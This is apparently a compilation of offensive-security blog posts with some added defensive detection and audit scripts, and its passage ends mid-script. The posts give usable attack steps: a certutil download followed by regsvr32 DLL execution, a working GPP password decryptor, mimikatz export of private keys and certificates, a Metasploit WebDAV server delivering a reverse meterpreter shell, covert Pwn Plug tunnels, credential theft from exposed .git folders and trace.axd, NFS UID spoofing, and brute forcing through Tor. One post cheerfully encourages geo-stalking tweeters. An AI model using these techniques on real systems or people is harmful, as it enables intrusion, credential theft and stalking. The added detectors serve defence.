Carnal0wnage
Quick post putting together some Twitter awesomeness. References:
https://twitter.com/subtee/status/888125678872399873
https://twitter.com/subTee/status/888071631528235010
https://twitter.com/malwaretechblog/status/733651527827623936
Let's do it:
1. Create your DLL
2. Base64-encode it (optional)
3. Use certutil.exe -urlcache -split -f http://example/file.txt file.blah to pull it down
4. Base64-decode the file with certutil
5. Execute the DLL with regsvr32: regsvr32 /s /u mydll.dll
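Detection for the chain above, as an added example that is not from the post: three command-line rules run over constructed process-creation records, and a host where all three fire gets escalated as one incident instead of three low-value tickets. The record field names (host, parent, cmdline) are assumptions about your log source.

```python
import re

# Constructed sample process-creation events (host, parent process, command line).
# Made-up records for this example, not data from the original post.
SAMPLE_EVENTS = [
    {"host": "ws01", "parent": "cmd.exe",
     "cmdline": "certutil.exe -urlcache -split -f http://example/file.txt file.blah"},
    {"host": "ws01", "parent": "cmd.exe",
     "cmdline": "certutil -decode file.blah mydll.dll"},
    {"host": "ws01", "parent": "cmd.exe",
     "cmdline": "regsvr32 /s /u mydll.dll"},
    {"host": "ws02", "parent": "services.exe",
     "cmdline": "certutil.exe -verify -urlfetch server.cer"},
    {"host": "ws03", "parent": "msiexec.exe",
     "cmdline": 'regsvr32.exe /s "C:\\Program Files\\Vendor\\comlib.dll"'},
]

# Each rule: (name, pattern over the command line, severity when it fires on its own).
RULES = [
    # certutil used as a downloader: -urlcache with -f fetches an arbitrary URL to disk
    ("certutil_urlcache_download",
     re.compile(r"\bcertutil(?:\.exe)?\b.*-urlcache\b.*-f\b", re.I), "medium"),
    # certutil used to turn a Base64 text blob back into a binary
    ("certutil_decode",
     re.compile(r"\bcertutil(?:\.exe)?\b.*-decode\b", re.I), "medium"),
    # silent regsvr32 with /u: DllUnregisterServer runs, which is where the payload sits
    ("regsvr32_silent_unregister",
     re.compile(r"\bregsvr32(?:\.exe)?\b(?=.*\s/s\b)(?=.*\s/u\b)", re.I), "low"),
]

# The full sequence from the post: fetch, decode, load.
CHAIN = {"certutil_urlcache_download", "certutil_decode", "regsvr32_silent_unregister"}


def match_event(event):
    """Return the (rule_name, severity) pairs that fire on one event."""
    hits = []
    for name, pattern, severity in RULES:
        if pattern.search(event["cmdline"]):
            hits.append((name, severity))
    return hits


def analyze(events):
    """Run every rule over every event; one alert dict per rule hit."""
    alerts = []
    for event in events:
        for name, severity in match_event(event):
            alerts.append({"host": event["host"], "rule": name,
                           "severity": severity, "cmdline": event["cmdline"]})
    return alerts


def chained_hosts(alerts):
    """Hosts on which every step of the chain fired; treat these as one 'high'."""
    seen = {}
    for alert in alerts:
        seen.setdefault(alert["host"], set()).add(alert["rule"])
    return {host for host, rules in seen.items() if CHAIN <= rules}


if __name__ == "__main__":
    found = analyze(SAMPLE_EVENTS)
    for alert in found:
        print(f'{alert["host"]:5} {alert["severity"]:6} {alert["rule"]:28} {alert["cmdline"]}')
    print("chain complete on:", sorted(chained_hosts(found)))
```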
Carnal0wnage
Geo/social stalking is fun. Bing Maps has the ability to add various "apps" to the map to enhance your Bing Maps experience. One of the cooler ones is the Twitter Map app, which lets you map geotagged tweets.
Let's start with somewhere fun, like the Pentagon, and see who's tweeting around there.
Once you have your places picked out, you can click on the Map Apps tab.
If you click on the Twitter Maps app, it loads recent geo-tagged tweets.
As you zoom in, you get a bit more detail.
You can also follow specific users and follow them around town :-)
Thanks to indi303 for telling me about this.
-CG
Carnal0wnage
Ron over at SkullSecurity put out a post on Using "Git Clone" to get Pwn3D. Worth a read if you haven't. Unfortunately the key to his post relied on wget and directory listings making it possible to download everything in the /.git/* folders.
Unfortunately(?) I don't run into this too often. What I do see is the presence of the /.git/ folder; sometimes the config or index files are there, but there is certainly no way to know what's in the object folders (where the good stuff lives) [or so I thought].
So I posed the following to Twitter, to which I got two great replies.
The first one pointed me to https://github.com/evilpacket/DVCS-Pillage (thanks Kos), and the second was a shortcut to using the tool by the author (thanks Adam).
DVCS-Pillage is pretty handy. With it you can pillage accessible Git, Hg and Bzr repos. Similar functionality for SVN already exists in Metasploit. Does it work? Yes, mostly... an example:
user@ubuntu:~/pentest/DVCS-Pillage$ ./gitpillage.sh www.site.com/.git/
Initialized empty Git repository in /home/user/pentest/DVCS-Pillage/www.site.com/.git/
Getting refs/heads/master
Getting objects/ef/72174d7a5d893XXXXXXXXXXXXXXXXXXXX
Getting index
Getting .gitignore
curl: (22) The requested URL returned error: 404
About to make 245 requests to www.site.com; This could take a while
Do you want to continue? (y/n)y
Getting objects/01/f0d130adf04d66XXXXXXXXXXXXXXXX9e4ddb41
Getting objects/49/403ecc2d8a343da9XXXXXXXXXXXXXXX3f094d9
Getting objects/d3/1195ab0e695f8b89XXXXXXXXXXXXXXXXXa3af5
Getting objects/f9/b926f07XXXXXXXXXXXXXXXXXXXX567cf438c6a
Getting objects/57/78a12e2edebXXXXXXXXXXXXXXXXXXX3f3a0e8d
---snip---
trying to checkout files
error: git checkout-index: unable to read sha1 file of wp-register.php (caad4f2b21c37bXXXXXXXXXXXXXXX81c7949ec4f74e)
#### Potentially Interesting Files ####
wp-admin/export.php - [CHECKED OUT]
wp-admin/includes/export.php - [CHECKED OUT]
wp-admin/setup-config.php - [CHECKED OUT]
wp-config-sample.php - [CHECKED OUT]
wp-config.php - [CHECKED OUT]
wp-settings.php - [CHECKED OUT]
anything useful in there?
user@ubuntu:~/pentest/DVCS-Pillage/www.site.com$ more wp-config.php
/**
* The base configurations of the WordPress.
*
* This file has the following configurations: MySQL settings, Table Prefix,
* Secret Keys, WordPress Language, and ABSPATH. You can find more information by
* visiting {@link http://codex.wordpress.org/Editing_wp-config.php Editing
* wp-config.php} Codex page. You can get the MySQL settings from your web host.
*
* This file is used by the wp-config.php creation script during the
* installation. You don't have to use the web site, you can just copy this file
* to "wp-config.php" and fill in the values.
*
* @package WordPress
*/
// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define('DB_NAME', 'site_wordpress');
/** MySQL database username */
define('DB_USER', 'site_wp');
/** MySQL database password */
define('DB_PASSWORD', 'XXXXXXXX');
another way to turn a low to pwned :-)
Carnal0wnage
So I put this link out on Twitter but forgot to put it on the blog.
I did a talk at the Oct 2012 NovaHackers meeting on exploiting 2008 Group Policy Preferences (GPP) and how they can be used to set local users and passwords via group policy.
I've run into this on a few tests where people are taking advantage of this extremely handy feature to set passwords across the whole domain, and then allowing users or attackers the ability to decrypt these passwords and subsequently 0wning everything :-)
So here are the slides: Exploiting Group Policy Preferences (from chrisgates)
Blog post explaining the issue in detail:
http://esec-pentest.sogeti.com/exploiting-windows-2008-group-policy-preferences
Metasploit post module:
http://metasploit.com/modules/post/windows/gather/credentials/gpp
PowerShell module to do it:
http://obscuresecurity.blogspot.com/2012/05/gpp-password-retrieval-with-powershell.html
I ended up writing some Ruby to do it (the blog post has some Python) because the Metasploit module was downloading the XML file to loot but crapping out prior to getting to the decode part. Now you can do it yourself:
require 'openssl'
require 'base64'

# cpassword value as stored in the GPP XML: standard Base64 with the '=' padding stripped
encrypted_data = "j1Uyj3Vx8TY9LtLZil2uAuZkFQA/4latT76ZwgdHdhw"

def decrypt(encrypted_data)
  # restore the Base64 padding only when the length is not already a multiple of 4
  remainder = encrypted_data.length % 4
  padding = remainder.zero? ? "" : "=" * (4 - remainder)
  decoded = Base64.decode64("#{encrypted_data}#{padding}")
  # static AES-256 key that Microsoft published in the GPP documentation
  key = "\x4e\x99\x06\xe8\xfc\xb6\x6c\xc9\xfa\xf4\x93\x10\x62\x0f\xfe\xe8\xf4\x96\xe8\x06\xcc\x05\x79\x90\x20\x9b\x09\xa4\x33\xb6\x6c\x1b"
  aes = OpenSSL::Cipher.new("AES-256-CBC") # OpenSSL::Cipher::Cipher is the deprecated spelling
  aes.decrypt
  aes.key = key
  # the IV is left at the default all-zero block, which is what GPP uses
  plaintext = aes.update(decoded) + aes.final
  # the password is UTF-16LE; convert it properly instead of dropping the high bytes
  plaintext.force_encoding('UTF-16LE').encode('UTF-8')
end

puts decrypt(encrypted_data)
In Action:
user@ubuntu:~$ ruby gpp-decrypt-string.rb
Local*P4ssword!
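The defensive counterpart, as an added example that is not from the post: rather than decrypting anything, it walks a SYSVOL copy for the preference XML files that can carry a cpassword attribute and reports which items still set one. The Groups.xml below is a constructed sample with placeholder GUIDs; only the cpassword value is the one from the post.

```python
import os
import tempfile
import xml.etree.ElementTree as ET

# Preference files whose <Properties> element may carry a cpassword attribute.
GPP_FILES = {"Groups.xml", "Services.xml", "ScheduledTasks.xml",
             "DataSources.xml", "Drives.xml", "Printers.xml"}

# Constructed Groups.xml in the shape GPP writes under SYSVOL. GUIDs are placeholders;
# the cpassword value is the one the Ruby script above decrypts. Not from a real domain.
SAMPLE_GROUPS_XML = """<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{00000000-0000-0000-0000-000000000000}">
  <User clsid="{00000000-0000-0000-0000-000000000000}" name="LocalAdmin" image="2"
        changed="2012-10-01 12:00:00" uid="{00000000-0000-0000-0000-000000000001}">
    <Properties action="U" newName="" fullName="" description=""
                cpassword="j1Uyj3Vx8TY9LtLZil2uAuZkFQA/4latT76ZwgdHdhw"
                changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0"
                userName="LocalAdmin"/>
  </User>
  <User clsid="{00000000-0000-0000-0000-000000000000}" name="Helpdesk" image="2"
        changed="2012-10-02 09:30:00" uid="{00000000-0000-0000-0000-000000000002}">
    <Properties action="U" newName="" fullName="" description=""
                changeLogon="0" noChange="0" neverExpires="0" acctDisabled="0"
                userName="Helpdesk"/>
  </User>
</Groups>
"""


def find_cpasswords(xml_text, source="<string>"):
    """Return one finding per element carrying a non-empty cpassword attribute.

    Nothing is decrypted: the account, last-changed time and action are enough to
    triage the finding and locate the preference item that has to go.
    """
    root = ET.fromstring(xml_text)
    parent_of = {child: parent for parent in root.iter() for child in parent}
    findings = []
    for elem in root.iter():
        cpassword = elem.get("cpassword")
        if not cpassword:
            continue
        item = parent_of.get(elem, root)
        findings.append({
            "source": source,
            "item": item.get("name", item.tag),
            "account": elem.get("userName") or elem.get("accountName") or "",
            "action": elem.get("action", ""),
            "changed": item.get("changed", ""),
            "cpassword_len": len(cpassword),
        })
    return findings


def scan_sysvol(root_dir):
    """Walk a SYSVOL copy (or any directory) and check every GPP XML file by name."""
    findings = []
    for dirpath, _dirs, files in os.walk(root_dir):
        for fname in files:
            if fname not in GPP_FILES:
                continue
            path = os.path.join(dirpath, fname)
            with open(path, encoding="utf-8-sig") as fh:
                try:
                    findings.extend(find_cpasswords(fh.read(), source=path))
                except ET.ParseError as err:
                    # a file that will not parse still deserves a look
                    findings.append({"source": path, "item": "PARSE ERROR", "account": "",
                                     "action": "", "changed": str(err), "cpassword_len": 0})
    return findings


def demo_scan():
    """Write the constructed file into a throwaway SYSVOL-like tree and scan it."""
    with tempfile.TemporaryDirectory() as tmp:
        gpp_dir = os.path.join(tmp, "Policies", "{GUID}", "Machine", "Preferences", "Groups")
        os.makedirs(gpp_dir)
        with open(os.path.join(gpp_dir, "Groups.xml"), "w", encoding="utf-8") as fh:
            fh.write(SAMPLE_GROUPS_XML)
        return scan_sysvol(tmp)


if __name__ == "__main__":
    for f in demo_scan():
        print(f'{f["source"]}: {f["item"]} ({f["account"]}) action={f["action"]} changed={f["changed"]}')
```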
Carnal0wnage

So we all know that mimikatz dumps hashes and passwords!!! from memory, which is the shiznazzle.
But now that it's working in memory, you can do lots more with it. Below are the various modules, as mimikatz itself lists them:
standard ; commandes de base
crypto ; Cryptographie et certificats
sekurlsa ; Dump de hashes et de mots de passes Windows
system ; Gestion système
process ; Manipulation des processus
thread ; Manipulation des threads
service ; Manipulation des services
privilege ; Manipulation des privilèges
winmine ; Manipulation du démineur de Windows XP (démonstration)
minesweeper ; Manipulation du démineur de Windows Vista et 7 (démonstration)
nogpo ; Pour éviter quelques GPO triviales
samdump ; Dump de SAM offline
inject ; Injecteur de librairies
ts ; Manipulations Terminal Server
divers ; Fonctions diverses trop petites pour s'émanciper
The crypto module does some interesting things. I briefly talked about stealing certificates at DerbyCon; the crypto module helps you do this.
Things you are probably interested in are crypto::listkeys, crypto::listProviders, crypto::listStores and crypto::listCertificates, to identify fun stuff that you want for your own from the host, and then crypto::exportKeys and crypto::exportCertificates to take that stuff home.
It kinda looks like this:
meterpreter > execute -H -i -c -m -d calc.exe -f mimikatz.exe -a '"crypto::listStores" exit'
Process 9904 created.
Channel 20 created.
mimikatz 1.0 x86 (RC) /* Traitement du Kiwi (Sep 8 2012 15:18:27) */
// http://blog.gentilkiwi.com/mimikatz
mimikatz(commandline) # crypto::listStores
Emplacement : 'CERT_SYSTEM_STORE_CURRENT_USER'
My Root Trust CA TrustedPublisher Disallowed AuthRoot TrustedPeople ADDRESSBOOK
mimikatz(commandline) # exit
execute -H -i -c -m -d calc.exe -f mimikatz.exe -a '"crypto::listCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE My" exit'
Process 3472 created.
Channel 12 created.
mimikatz 1.0 x86 (RC) /* Traitement du Kiwi (Sep 6 2012 04:02:46) */
// http://blog.gentilkiwi.com/mimikatz
mimikatz(commandline) # crypto::listCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE My
Emplacement : 'CERT_SYSTEM_STORE_LOCAL_MACHINE'\My
- sqlapps01
Container Clé : SELFSSL
Provider : Microsoft RSA SChannel Cryptographic Provider
Type : AT_KEYEXCHANGE
Exportabilité : OUI
Taille clé : 1024
mimikatz(commandline) # exit
execute -H -i -c -m -d calc.exe -f mimikatz.exe -a '"crypto::exportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE" exit'
Process 6112 created.
Channel 23 created.
mimikatz 1.0 x86 (RC) /* Traitement du Kiwi (Sep 6 2012 04:02:46) */
// http://blog.gentilkiwi.com/mimikatz
mimikatz(commandline) # crypto::exportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE
Emplacement : 'CERT_SYSTEM_STORE_LOCAL_MACHINE'\My
- MACHINENAME
Container Clé : SELFSSL
Provider : Microsoft RSA SChannel Cryptographic Provider
Type : AT_KEYEXCHANGE
Exportabilité : OUI
Taille clé : 1024
Export privé dans 'CERT_SYSTEM_STORE_LOCAL_MACHINE_My_0_MACHINENAME.pfx' : OK
Export public dans 'CERT_SYSTEM_STORE_LOCAL_MACHINE_My_0_MACHINENAME.der' : OK
mimikatz(commandline) # exit
Once exported, you download the .pfx and .der files.
Carnal0wnage
We've been able to use the Pwn Plug on a few LARES Red Team tests.
We've mostly utilized the 3G out-of-band functionality; this allows us to more easily bridge that gap between physical and electronic attack. Either way it's been great and definitely a value add for us.
Pwn Plug Elite gives you several methods to egress a network (http://pwnieexpress.com/pages/remote-access):
:: All Pwn Plugs include aggressive reverse tunneling capabilities for persistent remote SSH access.
:: All tunnels are encrypted via SSH and will maintain access wherever the plug has an Internet connection.
:: The following covert tunneling options are available for traversing strict firewall rules & application-aware IPS:
- SSH over any TCP port
- SSH over HTTP requests (appears as standard HTTP traffic)
- SSH over SSL (appears as HTTPS)
- SSH over DNS queries (appears as DNS traffic)
- SSH over ICMP (appears as outbound pings)
- SSH Egress Buster (top 10 common egress ports)
- Out-of-band SSH over 3G/GSM cellular (Elite models)
Yak yak, let's see some action shots!
First some shots of the web interface to set up the various tunnels (taken from the web site).
It's pretty straightforward, and the documentation the Pwnie Express guys provide will get you up and running with whatever tunnel method you choose.
OK, now action shots.
Pwn Plug hanging out in an empty cube hooked up to the network.
With the 3G stick plugged in. Sorry, kinda blurry, couldn't go back and take another ;-/
Final placement behind some boxes where it hung out for a few days.
Other useful reading/resources:
http://pwnieexpress.com/blogs/news/6156894-using-at-t-dataconnect-sim-cards-with-pwn-plug-elite
http://pwnieexpress.com/blogs/news/6156896-using-t-mobile-4g-pay-by-the-day-with-pwn-plug-elite
http://www.securitygeneration.com/security/pwn-plug-command-execution-using-usb-sticks/
http://www.securitygeneration.com/security/reverse-ssh-over-tor-on-the-pwnie-express/
http://www.securitygeneration.com/security/pwniescripts-for-pwnie-express/
Carnal0wnage
Metasploit comes with a dllhijacker module. The current module does not allow you to download exes; in fact these are specifically blacklisted. This makes sense because that's not what the exploit is for. Anyway, someone asked me if it was possible to download a file (specifically a pre-generated exe) over WebDAV. I know an auxiliary module to be a WebDAV server has been a request for a while, but it looked like the dll_hijacker module could accomplish it. I added a block of code to the process_get function to handle the exe and then removed .exe from the blacklist.
So if LOCALEXE is set to TRUE, then serve up the local exe in the path/filename you specify; if not, generate an executable based on the payload options (yes, I realize AV will essentially make this part useless).
The below is a "show options" with nothing set; the default is to generate an EXE payload. If you want to serve your own local EXE you need to set LOCALEXE to TRUE.
msf exploit(webdav_file_server) > show options
Module options (exploit/windows/dev/webdav_file_server):
Name Current Setting Required Description
---- --------------- -------- -----------
BASENAME policy yes The base name for the listed files.
EXTENSIONS txt yes The list of extensions to generate
LOCALEXE false yes Use a local exe instead of generating one based on payload options
LOCALFILE myexe.exe yes The filename to serve up
LOCALROOT /tmp/ yes The local file path
SHARENAME documents yes The name of the top-level share.
SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0
SRVPORT 80 yes The daemon port to listen on (do not change)
SSLCert no Path to a custom SSL certificate (default is randomly generated)
URIPATH / yes The URI to use (do not change).
Exploit target:
Id Name
-- ----
0 Automatic
msf exploit(webdav_file_server) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(webdav_file_server) > set LHOST 192.168.26.129
LHOST => 192.168.26.129
msf exploit(webdav_file_server) > set LPORT 5555
LPORT => 5555
msf exploit(webdav_file_server) > exploit
[*] Exploit running as background job.
[*] Started reverse handler on 192.168.26.129:5555
[*]
[*] Exploit links are now available at \\192.168.26.129\documents\
[*]
[*] Using URL: http://0.0.0.0:80/
[*] Local IP: http://192.168.26.129:80/
[*] Server started.
msf exploit(webdav_file_server) > [*] 192.168.26.1:17904 OPTIONS /documents/myexe.exe
[*] 192.168.26.1:17904 PROPFIND /documents/myexe.exe
[*] 192.168.26.1:17904 PROPFIND => 207 File (/documents/myexe.exe)
[*] 192.168.26.1:17904 PROPFIND /documents/myexe.exe
[*] 192.168.26.1:17904 PROPFIND => 207 File (/documents/myexe.exe)
[*] 192.168.26.1:17904 PROPFIND /documents
[*] 192.168.26.1:17904 PROPFIND => 301 (/documents)
[*] 192.168.26.1:17904 PROPFIND /documents/
[*] 192.168.26.1:17904 PROPFIND => 207 Directory (/documents/)
[*] 192.168.26.1:17904 PROPFIND => 207 Top-Level Directory
[*] 192.168.26.1:17904 GET => Delivering Generated EXE Payload
**Manually execute the exe**
[*] Sending stage (752128 bytes) to 192.168.26.1
[*] Meterpreter session 1 opened (192.168.26.129:5555 -> 192.168.26.1:17800) at Thu May 17 23:13:29 -0700 2012
Now if you want to serve a local exe
msf exploit(webdav_file_server) > jobs -K
Stopping all jobs...
[*] Server stopped.
msf exploit(webdav_file_server) > set LOCALEXE TRUE
LOCALEXE => TRUE
msf exploit(webdav_file_server) > exploit
[*] Exploit running as background job.
[*] Started reverse handler on 192.168.26.129:5555
[*]
[*] Exploit links are now available at \\192.168.26.129\documents\
[*]
[*] Using URL: http://0.0.0.0:80/
[*] Local IP: http://192.168.26.129:80/
[*] Server started.
msf exploit(webdav_file_server) > [*] 192.168.26.1:17870 OPTIONS /documents/myexe.exe
[*] 192.168.26.1:17870 PROPFIND /documents/myexe.exe
[*] 192.168.26.1:17870 PROPFIND => 207 File (/documents/myexe.exe)
[*] 192.168.26.1:17870 PROPFIND /documents/myexe.exe
[*] 192.168.26.1:17870 PROPFIND => 207 File (/documents/myexe.exe)
[*] 192.168.26.1:17870 PROPFIND /documents
[*] 192.168.26.1:17870 PROPFIND => 301 (/documents)
[*] 192.168.26.1:17870 PROPFIND /documents/
[*] 192.168.26.1:17870 PROPFIND => 207 Directory (/documents/)
[*] 192.168.26.1:17870 PROPFIND => 207 Top-Level Directory
[*] 192.168.26.1:17870 GET => Delivering Local EXE Payload [ /tmp/myexe.exe ]
I've tested this on Windows 7 and Windows XP, and I've been told this works with IE7 and below but not IE8. I've just been executing it on the command line.
Usage*:
copy \\ip\documents\myexe.exe myexe.exe
You may have to net use first:
net use \\ip\documents\ /User:Guest
You'll see Windows attempt the request over SMB, fail, then switch to doing the WebDAV thing.
Once the bin is on the box you can exec the bin manually.
*There are a couple of other ways to run this; the guy that asked me to help with all this will have a post on it soon.
Code is HERE in the GitHub repo. Be gentle, I don't usually do exploit code...
-CG
Carnal0wnage
Quick post on timing options with Burp Intruder.
Say you need to brute force something. Many devices (like Juniper SSL VPNs) will tell you to go to hell if you throw too many failed attempts at them too quickly. That sux.
I regularly use Intruder to do my brute forcing for me, especially since you can add timing options.
You can intercept your request, send it to Intruder, then add a payload marker for the username (and password if you want to do username/username).
Setting the payload spots
So if you just want to iterate through a list of usernames with the same pass, you just set the pass, then go to Payloads and add your user list. Above, I'm doing username and username as the password and using the pitchfork attack type. (I think Ken has gone over this in depth, so I'll stop explaining all that unless people ask for it.)
Our list of usernames
Once that is set up, you can play with timing options from the Options tab. This will adjust the number of threads and how long to wait in between requests.
Timing options
You may also want to send everything through Tor. Check the Burp main Options tab.
-CG
Carnal0wnage
Post [12] Trace.axd
"Trace.axd is an Http Handler for .Net that can be used to view the trace details for an application. This file resides in the application's root directory. A request to this file through a browser displays the trace log of the last n requests in time-order, where n is an integer determined by the value set by requestLimit="[n]" in the application's configuration file."
http://www.ucertify.com/article/what-is-traceaxd.html
"It is a separate file to store tracing messages. If you have pageOutput set to true, your webpage will acquire a large table at the bottom. That will list lots of information, the trace information. trace.axd allows you to see traces on a separate page, which is always named trace.axd."
http://www.dotnetperls.com/trace
LOW? Actually a Medium.
What can I do with it?
- Read ALL variables and data from HTTP requests
- POST requests rock! ?
Discovery? Metasploit

Example

Main trace.axd page

Viewing a request

Post request with creds
-CG
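Two checks a defender would want for this finding, as an added example that is not from the post: an audit of the <trace> element in web.config (the ASP.NET defaults enabled=false, localOnly=true, requestLimit=10 are assumed here), and a pass over IIS W3C logs for trace.axd actually being served to remote clients. The web.config fragments and log lines are constructed samples.

```python
import xml.etree.ElementTree as ET

# Constructed web.config fragments (none are from the post): remote tracing on,
# tracing restricted to the local machine, tracing off, and no trace element at all.
REMOTE_TRACE = """<configuration>
  <system.web>
    <trace enabled="true" localOnly="false" pageOutput="false" requestLimit="40" />
  </system.web>
</configuration>"""
LOCAL_TRACE = """<configuration>
  <system.web>
    <trace enabled="true" localOnly="true" requestLimit="10" />
  </system.web>
</configuration>"""
NO_TRACE = """<configuration>
  <system.web>
    <trace enabled="false" />
  </system.web>
</configuration>"""
DEFAULT_TRACE = "<configuration><system.web /></configuration>"

# Constructed IIS W3C log excerpt: 10.0.0.5 is the server, 203.0.113.7 and 198.51.100.9
# are outside clients. IIS writes '+' for spaces inside the user agent.
SAMPLE_IIS_LOG = """#Software: Microsoft Internet Information Services 7.5
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status sc-substatus sc-win32-status
2012-06-01 10:15:02 10.0.0.5 GET /trace.axd - 80 - 203.0.113.7 Mozilla/5.0+(compatible) 200 0 0
2012-06-01 10:15:09 10.0.0.5 GET /trace.axd id=3 80 - 203.0.113.7 Mozilla/5.0+(compatible) 200 0 0
2012-06-01 10:16:00 10.0.0.5 GET /trace.axd - 80 - 127.0.0.1 Mozilla/5.0+(compatible) 200 0 0
2012-06-01 10:17:00 10.0.0.5 GET /Default.aspx - 80 - 203.0.113.7 Mozilla/5.0+(compatible) 200 0 0
2012-06-01 10:18:00 10.0.0.5 GET /app/trace.axd - 80 - 198.51.100.9 curl/7.19.7 404 0 2
"""


def _flag(value, default):
    """ASP.NET boolean attributes: an absent attribute means the framework default."""
    if value is None:
        return default
    return value.strip().lower() == "true"


def assess_trace(config_xml):
    """Classify the <system.web><trace> element of one web.config.

    Assumed ASP.NET defaults: enabled=false, localOnly=true, requestLimit=10. A missing
    element is therefore safe; enabled with localOnly="false" is what exposes trace.axd.
    """
    root = ET.fromstring(config_xml)
    trace = root.find("./system.web/trace")
    attrs = trace.attrib if trace is not None else {}
    enabled = _flag(attrs.get("enabled"), False)
    local_only = _flag(attrs.get("localOnly"), True)
    request_limit = int(attrs.get("requestLimit", "10"))
    if not enabled:
        risk = "none"
    elif local_only:
        risk = "low"      # still readable from the box itself (shared hosting, local proxies)
    else:
        risk = "medium"   # any client can read the last requestLimit requests, creds included
    return {"enabled": enabled, "local_only": local_only,
            "request_limit": request_limit, "risk": risk}


def trace_axd_hits(log_text):
    """Return (client_ip, uri) for trace.axd requests answered 200 to non-loopback clients.

    Column positions come from the #Fields: header, so a different log layout still parses.
    """
    fields, hits = [], []
    for line in log_text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if not line or line.startswith("#") or not fields:
            continue
        row = dict(zip(fields, line.split()))
        stem = row.get("cs-uri-stem", "").lower()
        if not stem.endswith("/trace.axd") or row.get("sc-status") != "200":
            continue
        if row.get("c-ip") in ("127.0.0.1", "::1"):
            continue
        query = row.get("cs-uri-query", "-")
        hits.append((row["c-ip"], stem if query == "-" else f"{stem}?{query}"))
    return hits


if __name__ == "__main__":
    for name, cfg in (("remote", REMOTE_TRACE), ("local", LOCAL_TRACE),
                      ("off", NO_TRACE), ("absent", DEFAULT_TRACE)):
        print(name, assess_trace(cfg))
    for ip, uri in trace_axd_hits(SAMPLE_IIS_LOG):
        print("trace.axd served to", ip, uri)
```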
Carnal0wnage
Post [11] Honorable Mention: Open NFS
Open NFS mounts/shares are awesome. Talk about sometimes finding "The Goods". More than once an organization has been backing up everyone's home directories to an NFS share with bad permissions, so checking to see what's shared and what you can access is important.
Low? Currently an "info" with Nessus 5.
Anyway, you probably want to know about finding it. You have a few options, starting with standard portscanning (of course):
1. Scan for port 111/2049
2. Run showmount -e / showmount -a
3. Use the Metasploit module
Example:
[root@attacker]# showmount -e 192.168.0.1
Export list for 192.168.0.1:
/export/home/ (everyone)
/export/mnt/ (everyone)
/export/share/ (everyone)
Then look to see what's exported and who is mounting ("everyone" FTW).
To mount an NFS share, use the following after first creating a directory on your local machine:
[root@attacker ~]# mount -t nfs 192.168.0.1:/export/home /tmp/badperms
Change directories to /tmp/badperms and you should see the contents of /export/home on 192.168.0.1.
To abuse NFS you can check out the rest from http://www.vulnerabilityassessment.co.uk/nfs.htm; it talks about tricking NFS into becoming users. I'm going to put it here in case it goes missing later:
"You ask now, how do you circumvent file permissions and the use of the sticky bit, this is done with a little prior planning and sleight of hand to confuse the remote machine.
If we have a /export/home/dave directory that we have gone into, we will see a number of files belonging to dave, some or all of which you may be able to read. The one thing the system will give you is the owners UID on the remote system after issuing an ls -al command i.e.
-rwxr----- 517 wheel 898 daves_secret_doc
The permissions at the moment do not let you do anything with the file as you are not the owner (yet) and not a member of the group wheel.
Move away from the mount point and unmount the share
umount /local_dir
create a user called dave
useradd dave
passwd dave
Edit /etc/passwd and change the UID to 517
Remount the share as local root
Go into daves directory
cd dave
issue the command
su dave
As you are local root you can do this and as you have an account called dave you will not need a password
Now the quirky stuff - As the UID for your local account dave matches the username and UID of the remote, the remote system now thinks you're his dave, hey presto you can now do whatever you want with daves_secret_doc."
NfSpy is supposed to assist with the above: https://github.com/bonsaiviking/NfSpy
Nmap scripts to do additional info gathering: nfs-ls, nfs-showmount, nfs-statfs
Valsmith and hdmoore gave their Tactical Exploitation talk at DEF CON 15 and talked about NFS (file services section of the slides, video, white paper). They also gave it at Black Hat in a much longer format; unfortunately the video is broken into multiple 14-minute parts, so go Google for it (lazy).
Fun reading:
Swiss Cyber Storm II Case: NFS Hacking:
http://www.csnc.ch/misc/files/publications/2009_scsII_axel_neumann_NFS.pdf
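An audit for the server side of this post, as an added example that is not from the post or the quoted write-up: it parses /etc/exports and showmount -e output, and rates each export on the three things the techniques above depend on (exported to everyone, no_root_squash, and AUTH_SYS trusting whatever UID the client claims, which is exactly what the useradd-to-UID-517 trick relies on and what root_squash alone does not stop). Both inputs are constructed samples.

```python
import re

# Constructed /etc/exports for the example (not from the post). The first three entries
# mirror the "(everyone)" exports in the showmount output above; the last two are restricted.
SAMPLE_EXPORTS = """# /etc/exports (constructed sample)
/export/home   *(rw,no_root_squash)
/export/mnt    *(rw)
/export/share  (ro)
/export/build  10.10.0.0/24(rw,root_squash,sec=krb5p)
/export/pub    *.corp.example(ro,sec=sys)
"""

# Constructed showmount -e output in the same shape as the post's example.
SAMPLE_SHOWMOUNT = """Export list for 192.168.0.1:
/export/home/ (everyone)
/export/mnt/ (everyone)
/export/share/ (everyone)
/export/build/ 10.10.0.0/24
"""

# host part (may be empty) followed by an optional (option,list)
CLIENT_SPEC = re.compile(r"^([^(]*)(?:\((.*)\))?$")


def parse_exports(text):
    """Parse /etc/exports into [(path, [(client, {options}), ...]), ...].

    A client spec with no host part, or a path with no clients at all, means any
    host, which exportfs/showmount report as (everyone).
    """
    entries = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        parts = line.split()
        clients = []
        for token in parts[1:]:
            m = CLIENT_SPEC.match(token)
            host = m.group(1) or "*"
            opts = {o for o in (m.group(2) or "").split(",") if o}
            clients.append((host, opts))
        if not clients:
            clients.append(("*", set()))
        entries.append((parts[0], clients))
    return entries


def audit_exports(text):
    """One finding per (path, client) naming the weaknesses the post's techniques rely on."""
    findings = []
    for path, clients in parse_exports(text):
        for host, opts in clients:
            world = host == "*"
            writable = "rw" in opts
            root_kept = "no_root_squash" in opts
            kerberos = any(o.startswith("sec=krb5") for o in opts)
            issues = []
            if world:
                issues.append("exported to everyone")
            if root_kept:
                issues.append("no_root_squash: remote root acts as root")
            if not kerberos:
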